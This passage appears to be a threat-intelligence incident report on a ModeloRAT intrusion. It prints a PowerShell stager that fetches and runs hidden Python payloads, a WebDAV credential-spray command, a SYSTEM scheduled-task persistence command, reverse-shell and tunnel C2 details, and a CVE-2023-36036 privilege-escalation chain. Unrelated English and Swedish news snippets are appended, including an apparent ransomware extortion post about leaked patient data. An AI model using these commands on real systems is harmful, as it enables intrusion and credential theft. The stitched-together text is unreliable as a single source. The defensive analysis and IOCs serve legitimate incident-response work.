(reconnaissance)Pmanager.py (primary C2 agent, Modelo RAT)Execution was handled via pythonw.exe, which allowed the script to run in the background without showing the terminal window.iwr -Uri "https://www.dropbox[.]com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:appdata\Winp.zip"; Expand-Archive -Path "$env:appdata\Winp.zip" -DestinationPath "$env:appdata"; rm "$env:appdata\Winp.zip"; Start-Sleep -Seconds 5; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\collector.py; Start-Sleep -Seconds 30; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\Pmanager.py; Start-Sleep -Seconds 5Figure 2: PowerShell stager retrieving and executing portable Python payload.Reconnaissance: Environment discovery via native toolsThe first Python module executed by the attacker was collector.py, a post-exploitation information gatherer designed to silently profile the host and save the results to %TEMP%\configA.json. Additionally, before any of the recon the collector.py computes a host fingerprint. This 8-character fingerprint is what the operator's C2 server uses to identify this victim.The script gathered the following information:System identity and patch levelsysteminfo, domain queriesPrivilege contextwhoami /all and .NET Security.Principal checks (USER / ADMIN / SYSTEM)Processes and servicesGet-Process, Get-ServiceNetwork visibilitygetmac.exe, arp -a, Get-NetTCPConnection, ping.exeDomain visibilityran adsisearcher to enumerate accessible systemsAV-SolutionsSecurityhealthhost.exe, which is commonly used to verify if anti-virus solutions are running on the systemTable 1: Host Reconnaissance and Environment Enumeration.All of these commands were executed through hidden PowerShell sessions using the CREATE_NO_WINDOW flag, allowing the script to run in the background without spawning visible console windows.Part of reconnaissance was also a collection of installed hotfixes and system version data. The attacker was able to assess whether the host was vulnerable to a version-specific local privilege escalation exploit later used in the intrusion.Additionally, collector.py and all other python modules dropped by malware were obfuscated. However, it was not difficult to recover code structure close to the original. Figure 3: Obfuscated collector.pyStage 2: Ties to ModeloRATShortly after reconnaissance is completed, the attack shifts into its second stage as with the execution of Pmanager.py.pythonw.exe ...\python\Pmanager.py startFigure 4: Execution of Pmanager.py initiating second-stage C2 activity.As soon as it is started, the script creates a long-running HTTP beacon over port 80 that rotates across 5 hardcoded C2 servers: 46.225.231[.]170, 144.172.99[.]68, 64.94.85[.]158, 140.82.6[.]45, and 45.76.241[.]51.The script can load DLLs via rundll32.exe, launch additional Python scripts, run PowerShell commands, or install .msi packages. It also handles persistence and can update or remove itself. The reconnaissance output saved in configA.json is sent back to the C2, giving the operator a full picture of the host before issuing further tasks.This behavior closely matches the ModeloRAT framework documented by Huntress (KongTuke / CrashFix campaigns). Its communication format, persistence mechanisms, and delivery model all match what has been previously observed, with no significant deviations.The key difference is in initial access: Where earlier campaigns relied on malicious browser extensions, this intrusion used Microsoft Teams social engineering to achieve execution.The on-demand shells and the WebDAV Pmanager quickly deployed its first additional module USOShared1297.py onto the infected host. This module is a TCP reverse shell that opens 2 outbound sockets to one of 3 hardcoded C2 IPs (144.172.88[.]18, 64.190.113[.]187, 45.59.122[.]231. The port 50508 is reserved for the interactive shell that the attacker can use and port 60503 is for file transfer. The shell itself is a cmd.exe spawned using CreatePipe and CreateProcessA with the CREATE_NO_WINDOW and STARTF_USESTDHANDLES flags.This access was then used to test credential reuse across the environment through repeated WebDAV authentication attempts against internal systems.rundll32.exe davclnt.dll,DavSetCookie http:///C%24/WindowsFigure 5: WebDAV authentication spray using davclnt.dll (DavSetCookie)The DavSetCookie API forces Windows to initiate a WebDAV authentication attempt using the current user’s credentials. In effect, it allows the attacker to validate where those credentials are accepted without deploying additional tools. Within minutes, successful logon events started to appear across more than 100 internal systems.The HTTP shell – internal.pyNot long after, the attacker added a second way into the system by deploying back-to-back Microsoft5237.py dropped to %TEMP% and internal.py dropped to WPy64-31401\python. Later analysis showed they were actually the same file, just renamed (both had the same SHA-256 hash: 930263c0843744e269b615fb2ec79f83d7bd8b2cbf75e31fd5ea6c1aaa4e48fd). The attacker was reusing the same backdoor under different names.Each script launched a hidden PowerShell session. First it checked whether the system was domain-joined, and then set up a persistent remote shell.powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command "(Get-CimInstance Win32_ComputerSystem).Domain" powershell -NoProfile -NoExit -Command -Figure 6: The -NoExit flag keeps PowerShell running in the background, while the trailing “-” allows it to accept commands remotely.From there, internal.py turned that session into a full HTTP-based control channel. It registered with the C2 /handshake, continuously polled for instructions via /command/, executed them inside the PowerShell session, and returned output via /output/. The same channel handles file upload, download, and also screenshot capture. All of this communication ran over port 80 to 87.120.186[.]229 and 149.248.78[.]202, blending in with normal web traffic.Stage 3: Privilege escalation via CVE-2023-36036After gaining remote access, the attacker executed ssss.dll to escalate privileges.rundll32.exe ssss.dll startproc Mw2[REDACTED]Figure 7: Execution of ssss.dll via rundll32.The argument that was passed to startproc is a decryption key. The startproc function uses Mw2[REDACTED] to decrypt the payload.The ssss.dll (SHA-256: b00c1cbcfb98d2618a5c2ccb311da94f3c57709a397be6c8de29839f4e943976) is a reflective loader. The loader is using that key to decrypt an embedded payload in memory and execute it. The decrypted payload is testdllLPE.dll (SHA-256: d84245f3a374dd5eff8ecfdfad39077d76331fde799e5306430d0fc788db7f1d), a custom privilege escalation exploit targeting CVE-2023-36036. This vulnerability is a heap-based buffer overflow in cldflt.sys, the Windows Cloud Files Mini Filter Driver.Within seconds, the helper thread launched internal.py under a SYSTEM token, confirming that the exploit successfully modified the process privileges.What is CVE-2023-36036?The Cloud Files driver is what makes OneDrive's "Files On-Demand" work, allowing placeholder files to appear locally while being backed by cloud storage. Sync providers (OneDrive, Dropbox, Box) register themselves with the driver using the Cloud Files API, and the driver brokers I/O between the filesystem and the provider.CVE-2023-36036 is a heap buffer overflow in how cldflt.sys processes messages from these providers. By sending crafted data through the driver’s communication interface, an attacker can overflow an internal buffer and corrupt adjacent memory. With controlled heap layout, this corruption becomes a kernel write primitive.Reused technique, adapted exploitWhile analyzing the CVE-2023-36036 exploit, it became clear that the threat actor did not build their methodology from scratch. STAR Labs documented a similar chain in their analysis of CVE-2021-31969 also in cldflt.sys. Their work outlined the core steps: Register a fake sync provider, shape the kernel heap, trigger the overflow, and overwrite a token.The exploit we analyzed follows the same general playbook, but adapts it for the CVE-2023-36036 vulnerability.The threat actor reused three core steps from the STAR Labs research to stabilize their exploit:Sync provider registration. The exploit registers itself as "PLURIBUS" with GUID {904EE598-0511-4664-82A8-22C4A7501044}, pointing to %TEMP%\cldflt. This causes the driver to treat the directory as a valid Cloud Files root and route file operations through the vulnerable path.WNF heap shaping. The exploit uses 4 undocumented ntdll syscalls: NtCreateWnfStateName, NtUpdateWnfStateData, NtDeleteWnfStateData, and NtQueryWnfStateData to allocate a large number of small objects in the kernel pool. This shapes memory so the overflow lands on controlled data instead of random structures. Without this step, the buffer overflow in cldflt.sys would write to unpredictable addresses and can crash the systemData-Only Token Overwrite. Instead of using process injection or shellcode, the exploit uses its own token in kernel memory by flipping a privilege bit to gain SYSTEM access. What sets testdllLPE.dll apart is what the operator added on top of that scaffolding.Kernel discovery method. It probes the kernel address range in 1 MB steps, measuring minute differences in memory access latency to identify ntoskrnl base. This avoids calling privileged APIs.Decoupled execution model. Instead of elevating the thread running the exploit, this binary spawns a helper thread that continuously polls PrivilegeCheck(SeDebugPrivilege). This allows the main exploit thread to crash, hang, or retry the kernel write multiple times without losing the payload. The moment the kernel finally flips the privilege bit, the helper thread detects the change and immediately launches internal.py as SYSTEM.Trigger path. The vulnerability is reached through the driver’s message handling path. When processing a FilterSendMessage request, cldflt.sys copies attacker-controlled data into a fixed-size buffer without proper bounds checking, overflowing into adjacent memory, specifically a function pointer.To trigger execution, the exploit creates a placeholder file within the fake sync root and writes to it.Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback.⠀When the driver intercepts the write to Link.log, it invokes the corrupted function pointer. This results in a controlled kernel write, which flips the SeDebugPrivilege bit in the helper thread's token.After the WriteFile call completes, the main exploit thread exits. The helper thread, which was polling PrivilegeCheck(SeDebugPrivilege) once per second since the exploit started, detects the change and breaks out of its loop. At this point, the privilege escalation has succeeded. The helper thread immediately launches the payload. Figure 9: Helper thread execution after privilege escalation succeeds.⠀Stage 4: Post-exploitation The newly spawned internal.py process was running under a SYSTEM token. The attacker confirmed this with whoami and immediately created a scheduled task (TempLogA) to execute internal.py daily at 13:00 with SYSTEM privileges.schtasks /create /tn TempLogA /tr "C:\Users\USER\AppData\Roaming\WPy64-31401\python\pythonw.exe internal.py" /sc daily /st 13:00 /ru SYSTEM /rl HIGHEST /fFigure 10: Creation of SYSTEM-level scheduled task (TempLogA) for persistence.With persistence in place, the attacker moved on to Active Directory enumeration.$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry().distinguishedName $s = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://$d") $s.PageSize = 1000 $s.Filter = "(objectClass=user)" $s.FindAll().CountFigure 11: Powershell command returns the total number of domain user accounts.Shortly after, the compromised account established a remote PowerShell session (WinRM) to a second host. Once connected, additional enumeration commands were executed through the remote PowerShell process (wsmprovhost.exe), extending visibility beyond the initial system.Expanding the footholdWithin hours of privilege escalation and enumeration, 3 additional Python modules were deployed:Microsoft5237.py: HTTP beacon to 87.120.186.229 and 149.248.78.202. Captures screenshots via PowerShell, monitors user logins/logouts, uploads files to C2.Dell508.py: Reverse TCP tunnel to 207.246.114.50 and 149.28.96.170 on port 80, disguised as HTTP upgrade. C2 server instructs victim to connect to specific internal targets; victim relays traffic bidirectionally.PCDr6967.py: SOCKS5 proxy to 96.9.125.29, 144.172.111.49, and 104.194.152.246 on port 50504. Routes attacker's tools (RDP, browsers, Nmap) through victim into internal network.Stage 5: The lock screen that wasn'tRoughly two hours after privilege escalation, the attacker deployed a second DLL.rundll32.exe com6848.dll,open e8vy[REDACTED]Figure 12: Execution of com6848.dll via rundll32 to deploy credential harvesting payload.The com6848.dll (SHA-256: 30e5a6c982396cdf3157195b540f75096869baa8570f66fab88c07c161be27f0, internal name apple.dll) is a 32-bit DLL with a single export open. Its .rdata section is over 5 MB and contains an encrypted payload. The decryption key was conveniently provided on the command line by the attacker.Once decrypted, the DLL reflectively loads a second stage stage2.dll (SHA-256: f5b2dbd8ec9671c0261f093ebc5f3d35920b592458a3b800cc946265111e67d0). This DLL renders a perfect replica of the Windows 10 lock screen, using the embedded font to ensure visual accuracy even on systems where the font isn’t installed. The user sees what appears to be a normal screen lock and types their password to unlock it. The DLL captures it, and writes the result to disk as yyyy-mm-dd-Log.txtWhat the credential unlockedWait, didn't the operator already have SYSTEM privileges? Why bother with a fake lock screen?By this point, indeed the operator had SYSTEM-level access on the host. What they didn't have, though, was the user's domain credentials. SYSTEM can authenticate using the machine account, but it cannot authenticate as the user. It can't access user-specific resources, such as file shares requiring the user's permissions, mailboxes, web applications expecting user credentials, or RDP sessions that need to establish an interactive logon as that specific domain account.The same evening, the attacker used harvested credentials to authenticate via RDP to another workstation in the network. DNS logs showed connections to Dropbox and some internal systems. Additionally, they also performed Kerberoasting against service accounts, requesting vulnerable Kerberos tickets in an attempt to expand access within the environment.The following morning, the attacker returned to the second host via RDP and used Microsoft Edge to download the Comae toolkit, including DumpIt, a legitimate memory acquisition tool. Two minutes after unarchiving the Comae toolkit, the threat actor navigated within the browser to uploadnow[.]io, which offers free anonymous file upload features. During this browser session, the threat actor searched via Bing if SwissTransfer was a safe site to transfer large files, likely evaluating additional exfiltration methods. Shortly after, DumpIt.exe was executed on the second host. DumpIt captures physical RAM, including LSASS process memory, which can contain cleartext passwords, NTLM hashes, and Kerberos tickets. Based on timing and network activity, the memory dump was likely exfiltrated via uploadnow[.]io.MITRE ATT&CK techniquesTECHNIQUE IDTECHNIQUE NAMET1566.003Phishing: Spearphishing via ServiceT1204.002User Execution: Malicious FileT1059.001Command & Scripting: PowerShellT1059.006Command & Scripting: PythonT1218.011System Binary Proxy Execution: Rundll32T1106Native APIT1053.005Scheduled Task/Job: Scheduled TaskT1068Exploitation for Privilege EscalationT1134.001Access Token Manipulation: Token ImpersonationT1134.004Access Token Manipulation: Parent PID SpoofingT1562.001Impair DefensesT1027Obfuscated Files or InformationT1027.002Software PackingT1027.009Embedded PayloadsT1620Reflective Code LoadingT1036.005MasqueradingT1140Deobfuscate/Decode Files or InformationT1112Modify RegistryT1055Process InjectionT1056.002Input Capture: GUI Input CaptureT1558.003Steal or Forge Kerberos Tickets: KerberoastingT1003.001OS Credential Dumping: LSASS MemoryT1003OS Credential DumpingT1018Remote System DiscoveryT1087.002Account Discovery: Domain AccountT1082System Information DiscoveryT1016System Network Configuration DiscoveryT1033System Owner/User DiscoveryT1083File and Directory DiscoveryT1021.006Remote Services: WinRMT1021.001Remote Services: RDPT1570Lateral Tool TransferT1071.001Application Layer Protocol: Web ProtocolsT1095Non-Application Layer ProtocolT1090.001Proxy: Internal ProxyT1090.002Proxy: External ProxyT1572Protocol TunnelingT1573Encrypted ChannelT1132.001Data Encoding: Standard EncodingT1568Dynamic ResolutionT1567.002Exfiltration Over Web ServiceT1041Exfiltration Over C2 ChannelIndicators of compromise (IOCs)CategoryIndicator TypeValueAttacker InfrastructureRogue M365 Tenant (Sender)itsupport@UCICasociacion.onmicrosoft.comAttacker InfrastructureTenant GUIDcdc15b4d-6fd6-4e90-9ee9-357fea475047Attacker InfrastructureClient HostnamesRICARDOGARC05B2, KALI-LINUX-2025-2Attacker InfrastructureInitial Access VectorMS Teams external chat (Impersonating "IT Support")Network C2Pmanager.py (ModeloRAT Beacon)46.225.231.170, 144.172.99.68, 64.94.85.158, 140.82.6.45, 45.76.241.51 Network C2collector.py (Exfiltration)87.120.186.229, 149.248.78.202 (Port 80)Network C2internal.py / Microsoft5237.py87.120.186.229, 149.248.78.202 (Port 80)Network C2USOShared1297.py (TCP Shell)144.172.88.18, 64.190.113.187, 45.59.122.231 (Ports 50508, 60503)Network C2PCDr6967.py (SOCKS5)96.9.125.29, 144.172.111.49, 104.194.152.246 (Port 50504)Network C2Dell508.py (HTTP Tunnel)207.246.114.50, 149.28.96.170 (Port 80)Persistence HostCloud Files Provider NamePLURIBUSPersistence HostCloud Files Provider GUID{904EE598-0511-4664-82A8-22C4A7501044}Persistence HostRegistry Persistence KeyHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager\PLURIBUS!*Persistence HostSync Root Path%TEMP%\cldflt\Persistence HostPlaceholder File%TEMP%\cldflt\Link.logMore indicators of compromise can be found on Rapid7’s GitHub.Key findingsModeloRAT pivoted from browser extensions to Teams social engineering.Portable Python environments bypass traditional EDR signatures.CVE-2023-36036 remains effective despite patch availability.Fake lock screens can harvest credentials even with SYSTEM access.WebDAV API abuse provides stealthy credential validation.It took two days to go from "Hi, this is IT support" to domain-wide credential access using a fake lock screen, a Python based RAT, and a two-year-old kernel exploit. If you were an incident responder, none of these techniques would have been new for you, and that’s the point.What particularly stands out is how quickly control shifted from endpoint to identity. Once valid credentials were obtained, the environment itself became the attack surface.

The retail trading subreddit submitted the sharpest criticism yet of the financial regulator's idea of letting companies report twice per year.

Roony Bardghji, 20, fick inte plats i Sveriges VM-trupp. Enligt Aftonbladet berodde petningen bland annat på att Barcelona-spelaren visat missnöje kring utebliven speltid. – Det här är nyheter för mig, säger Graham Potter till SVT Sport.

Ten students from an elite secondary school in Hong Kong were injured or experienced ringing in their ears after a self-heating hotpot pack exploded in a classroom on Wednesday. A police spokesman said officers received a report from St Paul’s Co-educational College in Mid-Levels at 3.29pm that a self-heating hotpot pack had exploded after being improperly heated. A source said a 15-year-old boy was preparing the hotpot pack at about 1pm when he poured hot water onto it, and it exploded. Six...

The voluntary recall follows an incident on 20 April where an empty Waymo car entered a flooded road in San Antonio, Texas.

BBC Chief Political Correspondent Henry Zeffman explains what is next for the government after the King's Speech.

The government-appointed administrator of Hong Kong’s fire-ravaged Wang Fuk Court has sought to delay an owners’ meeting, prompting calls from residents to hold it before the end of June to address concerns ahead of a decision on whether to sell their flats. The move by Hop On Management Company came after more than 240 owners, representing over 12 per cent of households at the estate in Tai Po, petitioned the administrator in late April to hold an extraordinary general meeting (EGM), warning...

SVT kan avslöja att Dante Peykar misstänks vara en del av Irans proxykrig i Sverige. 41-åringen – som nu sätts upp som ett högprioriterat mål på Europols most wanted-lista – kopplas enligt uppgift till det alias som beställde mordförsöket på Irankännaren Arvin Khoshnood.

Microsoft has fixed a Windows Autopatch bug that caused driver updates restricted by administrative policies to be deployed on some Autopatch-managed Windows devices in the European Union. [...]

Fotokonstnären Erik Johansson gör succé över världen med sina surrealistiska fotografier, inspirerad av Dalí och Magritte. Han bor i Tjeckien, men många av bilderna tar han i omgivningarna till föräldragården i Svenstorp utanför Götene där också hans permanenta galleri just öppnat för säsongen. – Det finns någonting magiskt i platserna där jag växte upp, säger Erik Johansson.

Det är nu en månad kvar tills VM i fotboll invigs i Mexico City. Tre mexikanska städer ska vara värdar för världens största fotbollsfest. En av dem är Mexikos näst största stad Guadalajara – där invånarna sedan länge har problem med förorenat vatten. Här har företag från hela världen etablerat sig, lockade av skattelättnader. Länge fanns inga miljöregler alls för vad fabrikerna fick släppa ut i floden som rinner runt stan. Idag efterföljs inte de som finns.”Vi tänker använda VM för att protestera – trots att de försöker skrämma oss till tystnad”, säger miljöaktivisten Sofia Enciso.

One seeks contractor to manage millions in taxpayer cash, will provide generous 20% off Windsor biscuit tins and tea towels

Did MS change the cadence in which they release M365 updates starting this Patch Tuesday? This is the first time a monthly enterprise channel release hasn’t aligned with Patch Tuesday, to my recollection. Maybe they’re just behind schedule? submitted by /u/xboxgaming1992 [link] [comments]

Email filters are important, but they can’t remove phishing risk on their own. Today’s campaigns are built to slip through the cracks, using fresh domains, CAPTCHA checks, fake login pages, OTP theft, and even legitimate RMM tools. For security leaders, the bigger issue is business exposure. One missed email can slow response, create uncertainty, and leave teams unsure […] The post How Top SOCs and MSSPs Prevent Phishing Incidents Missed by Email Filters appeared first on Cyber Security News.

U.S. House lawmakers want to know how hackers broke into education tech giant Instructure twice and stole reams of data from students who use the company's flagship student data software Canvas.

We have some iPad Air's that we use for kiosks, and they seem to work fine. However, we have a place where there are a large number of patrons with sight disabilities. So, we were thinking about adding a wired 27-inch external display to it, along with a physical keyboard. Is there any reason this wouldn't be just as reliable as a standalone iPad Air? submitted by /u/FatBook-Air [link] [comments]

[AI generated] N/A

I Storbritannien skedde det högtidliga öppnandet av parlamentet, där kungen läste upp premiärminister Keir Starmers regeringsförklaring.Men samtidigt är regeringen i kris – och allt mer tyder på att Starmer kommer att utmanas om makten.En del tyder på att han kanske redan i morgon formellt kommer att utmanas om makten. Den som allas blickar riktas mot nu är den brittiske hälsoministern Wes Streeting.

Are the pockets of Jeff Bezos not as deep as everyone thinks?

Foxconn has officially confirmed a cyberattack targeting its North American operations after the Nitrogen ransomware gang publicly listed the company on its data leak site, claiming to have stolen a staggering 8 terabytes of sensitive data. The Nitrogen ransomware group made its move on Monday, posting Foxconn on its breach and extortion portal and asserting […] The post Foxconn Confirms Cyberattack After Nitrogen Ransomware Gang Claim appeared first on Cyber Security News.

I årets Eurovision song contest representeras Finland av en duo: Violinisten Linda Lampenius och sångaren Pete Parkkonen som tillsammans framför låten Liekinheitin . Parkkonens karriär började med finska Idol-tävlingen och nådde nya höjder med en omtalad musikvideo som gav honom statusen som sexsymbol.

Anker's new Prime 3-in-1 Wireless Charging Station has been marked down to $104.99 on Amazon, down from $149.99. This is one of Anker's newest accessories, and Amazon's sale today is a match of the all-time low price. This deal, and many of the others shared below, is being matched at Anker.com, with additional savings applied for members. Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running. The Prime 3-in-1 Wireless Charging Station features Qi2.2 support, which lets a compatible MagSafe ‌iPhone‌ charge at up to 25W. It's the same speed as Apple's ‌MagSafe‌ charger, and it is 10W faster than the standard Qi2 ‌MagSafe‌ chargers. You can also simultaneously charge an Apple Watch and AirPods with the device. $45 OFFAnker Prime 3-in-1 Wireless Charging Station for $104.99 There are plenty of other Anker discounts happening on Amazon this week, including Anker's popular 3-in-1 MagSafe-Compatible Charging Cube for $86.99, down from $129.99. Below you'll find a list of the best Anker discounts on Amazon this week, also including wall chargers, portable chargers, and more. Although it's not on sale, Anker recently launched a new desktop charging accessory with the Anker Nano Desk Clamp Power Strip for $69.99. The new device attaches to your desk and has 10 total ports including six AC outlets, two USB-C ports, and two USB-A ports. It supports 70W USB-C fast charging and comes in white and black color options. Wall Chargers Nano USB-C Wall Charger - $29.99, down from $39.99 140W 4-Port GaN USB-C Charger - $79.99, down from $99.99 Wireless Chargers 3-in-1 MagSafe-Compatible UFO Charger - $69.99, down from $89.99 3-in-1 MagSafe-Compatible Foldable Charging Station - $85.99, down from $109.99 3-in-1 MagSafe-Compatible Charging Cube - $86.99, down from $129.99 3-in-1 Prime Wireless Charging Station - $104.99, down from $149.99 Prime MagSafe-Compatible 3-in-1 Charging Station - $159.99, down from $229.99 Portable Chargers SOLIX C300 Power Station with Lantern - $179.99, down from $249.00 Prime Power Bank 26,250 mAh - $171.48, down from $229.99 SOLIX C1000 Gen 2 Portable Power Station - $449.99, down from $799.00 SOLIX C2000 Gen 2 Portable Power Station - $799.99, down from $1,499.00 If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week. Deals Newsletter Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season! Related Roundup: Apple DealsThis article, "Anker's New Prime Charging Station Returns to Low Price on Amazon" first appeared on MacRumors.comDiscuss this article in our forums

The woman who was on a virus-hit ship shows "no signs of illness", the government of Pitcairn Islands, a British Overseas Territory, says.

I manage a bunch of 3D printers in an org that already has PaperCut set up. We need some kind of management software for the 3D printers and I'm wondering if the existing PaperCut setup will do it. It sounds like PaperCut's 3D workflow handles job submission and billing, but a human operator still has to print each file. Which doesn't seem ideal to me. Anyone using PaperCut for this? submitted by /u/Own_Soup4467 [link] [comments]

Gängtoppen Poya Shafie har beskrivits som en av de som står Foxtrot-ledaren Rawa Majids närmast. Shafie misstänks vara hjärnan bakom flera våldsdåd i Stockholm och Sundsvall. Under onsdagen började rättegången.

A new survey suggests most U.S. smartphone owners are not motivated to upgrade by foldable phone designs or AI features, a potential challenge for Apple as it prepares to launch both the rumored "iPhone Ultra" and an expanded suite of Apple Intelligence features this fall. The survey, commissioned by CNET and conducted by YouGov across 2,407 U.S. smartphone owners between April 29 and May 1, found that only 13% of respondents would consider upgrading for a phone concept such as a foldable or flip phone, while just 12% cited AI integrations as an upgrade motivator. Among iPhone owners specifically, interest in foldable designs was slightly higher at 14%. Apple is widely expected to launch its first foldable iPhone alongside the iPhone 18 Pro this fall, with a starting price of around $2,000. While a 13% interest statistic in foldable designs has been characterized as evidence of limited appeal, it may actually represent a larger addressable market than anticipated for a product most consumers have never used and whose likely price was not disclosed to respondents. Interest could shrink considerably once a $2,000-plus price tag enters the picture, and supply chain reports suggest smooth availability may not occur until 2027. Consumer sentiment around AI integrations dropped sharply from 2024 to 2025 before edging slightly higher in 2026, though the figure remains low at 12%. Previous surveys found that the majority of iPhone users felt existing ‌Apple Intelligence‌ features added little to no value to their experience. Price remains the overwhelming driver of upgrade decisions, cited by 55% of respondents, followed by longer battery life at 52%, and more storage at 38%. Those top three motivators are unchanged from 2025, when price led at 62%, battery life at 54%, and storage at 39%. Camera features (27%) and display size (22%) ranked well ahead of either foldables or AI as upgrade motivators. Smartphone owners are also not particularly swayed by a phone being thinner or available in new colors, findings that are relevant given Apple's recent emphasis on the ultra-thin iPhone Air and expanded color options across its lineup.Related Roundup: iPhone FoldTags: Apple Intelligence, CNETThis article, "Few Smartphone Owners Care About Foldables or AI, Survey Suggests" first appeared on MacRumors.comDiscuss this article in our forums

A cyber security expert says deleting chat history could lead to a lack of accountability if things go wrong.

The BBC's Sarah Smith explains the power dynamic between the two world leaders as they meet in Beijing.

A survey compiled from fintech firm Ramp’s clients’ expense data shows 34.4% of participating businesses are paying for Anthropic services, more than any other AI lab, while only 32.3% pay for OpenAI.

From October 13-15, TechCrunch Disrupt 2026 will feature 200+ sessions across six stages, led by 250+ tech leaders shaping the industry today. Register now to save up to $410, plus 50% off a second pass.

Meta said these incognito conversations are not saved, and messages will disappear by default once you close the chat.

Google announced its new Googlebook laptop platform yesterday, and so far I've been left asking, "Why?" Why is Google blowing up its Chromebook and ChromeOS platform for this? I've been excited by the prospect of Android and ChromeOS unifying under the long-rumored Aluminium OS. The theory was that Aluminium might unite Android and ChromeOS under […]

No one paid attention to the gunshots that echoed through the convention center. They were real enough, and so were the screams that accompanied them, in the sense that they were recordings of real people who, like guest stars on Law and Order, reenacted scenarios that had clearly been plucked from the headlines: a kidnapping, […]

At Rapid7, our commitment to our partners is built on the foundation of the PACT (Partnering with Accountability, Consistency, and Transparency) program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a Gold Stevie Award in the 2026 American Business Awards® for Achievement in Collaboration and Partnership. This recognition underscores our dedication to providing world-class training that translates directly into partner success and customer resilience.A new era of partner-led servicesTo meet the evolving needs of the cybersecurity landscape, Rapid7 Partner Academy has introduced specialized Partner Services Certifications. These role-based learning paths are designed to move beyond traditional "product training" by focusing on high-fidelity service delivery and outcome-driven results, including how to build, deliver, and scale services on Rapid7 solutions. The training and certification program was specifically recognized for its "Partner-First" design, which was built through extensive collaboration with our global partner ecosystem to ensure alignment with real-world sales and technical challenges.Our award-winning partner services certification ecosystem focuses on three critical pillars of the Rapid7 Command Platform:Partner Services for InsightIDR: Equips partners with the skills and knowledge necessary to effectively guide customers through the post-sale phases of the InsightIDR solution.Partner Services for Exposure Command: Focuses on the transition from static vulnerability scanning to continuous attack surface validation, diving into the setup, management, and troubleshooting of Exposure Command.Partner Services for Vulnerability Management: Empowers partners to provide impactful services around deployment, management, and ongoing support for InsightVM that drive customer success.All three of these Partner Services Certifications enable our partners to deliver services around Rapid7 solutions from deployment and onboarding, to management and best practices for usage, to express health checks and troubleshooting. Upon successful completion of the course theoretical exam, you are eligible to enroll in the Services Validation Component. After validating your services capabilities, you will receive the prestigious distinction of achieving the Rapid7 Partner Services Certification and Badge. This achievement helps to differentiate your services to your customers and prospects with official recognition among the most capable Rapid7 MSSPs and service delivery partners.Real-world impact: From training to executionThe Gold Stevie Award recognizes more than just curriculum—it recognizes the impact these certifications have on the partner's ability to drive business and accelerate their profitability with Rapid7. By completing these Rapid7 Partner Academy certifications, partners gain:Operational excellence: Technical specialists learn to deploy and manage Rapid7 solutions with a "Gold Standard" approach, ensuring high-fidelity results for customers.Strategic alignment: Sales professionals are trained in the RSP (Rapid7 Sales Professional) methodology, allowing them to position Rapid7 as the preferred solution through effective discovery and objection handling.Program economics: Certified partners can take full advantage of the 2026 PACT updates, which offer enhanced incentives and streamlined deal motions for partner-led growth.Collaborating for successThe Stevie Award for Achievement in Collaboration and Partnership specifically applauds how Rapid7 integrated partner feedback into the curriculum development. This wasn't just Rapid7 talking to partners; it was a co-innovation effort. By coordinating with partners and Rapid7 technical support stakeholders, we ensured that the Partner Academy content directly addresses the "last-mile" technical blockers partners face in the field.The value and impact of Partner Academy is highlighted by the comments from the Stevie American Business Awards® judges:"I’ve seen a lot of partner programs, and most are built for the vendor, not the partner. This one stands out...A 5X outperformance, 76% completion rate, 91% satisfaction, and an NPS of 68 all point to real value delivered, not vanity metrics. I’m especially impressed by the coordination behind it –100 contributors across 13 business units. That level of alignment is hard to achieve, and it shows strong leadership. The fact that the program was mentioned on an earnings call also signals clear strategic impact.""Overall, this is an outstanding and result-oriented program, and it sets the bar high for the partner enablement process. Exceeding the certification target by 5X within a significantly shortened timeframe speaks volumes for the relevance and execution of the program, and the creation of role-based, technically sophisticated learning paths speaks volumes for the focus on partner enablement."Celebrating our partnersThis award is a shared victory with the thousands of partner individuals who have invested in their professional development through the Partner Academy. Whether you are a technical expert seeking to “Command the Attack Surface” or a sales professional looking to protect your margins, the Partner Academy is your gateway to success in the Rapid7 ecosystem.Join the award-winning program and start your learning journey today!As we continue to innovate, our goal remains the same: to provide the most transparent, consistent, and world-class enablement program in the industry. We invite all partners to officially become a Rapid7 PACT Partner to explore these award-winning certifications and start driving deeper impact for your customers today.

Article URL: https://avkcode.github.io/blog/us-winning-ai-race.html Comments URL: https://news.ycombinator.com/item?id=48121929 Points: 64 # Comments: 172

Allele Diagnostics specializes in providing exceptional microarray and cytogenetic testing serv ices, including neonatal, pediatric, and prenatal testing. The company is dedicated to deliveri ng accurate, fast, and reliable results, leveraging the extensive experience of its laboratory staff to optimize testing performance. We will upload corporate data soon. Detailed employee personal information (passports, DLs, SSN s, I9 forms, credit card details and so on), patients information (personal docs and medical in formation), contracts and agreements, etc.

Southampton will play Hull in the Championship play-off final. Or will they? As Spygate moves towards its conclusion, Middlesbrough could yet head to Wembley.

Bittersweet post tells devs what they already knew: The framework is too slow

A newly disclosed Linux kernel vulnerability dubbed Fragnesia allows any local unprivileged user to escalate privileges to root without requiring a race condition, making it one of the more reliable local privilege escalation exploits seen in recent years. Discovered by William Bowling of the V12 security team, Fragnesia joins a growing class of dangerous kernel […] The post Fragnesia Linux Vulnerability Let Attackers Gain Root Privileges – PoC Released appeared first on Cyber Security News.

Roza was among several victims who gave testimony to Democratic lawmakers on Tuesday.

Microsoft has unveiled a new multi-model artificial intelligence (AI)-driven system called MDASH to facilitate vulnerability discovery and remediation at scale, adding that it's being tested by some customers as part of a limited private preview. MDASH, short for multi-model agentic scanning harness, is designed as a model-agnostic system that uses bespoke AI agents for different vulnerability

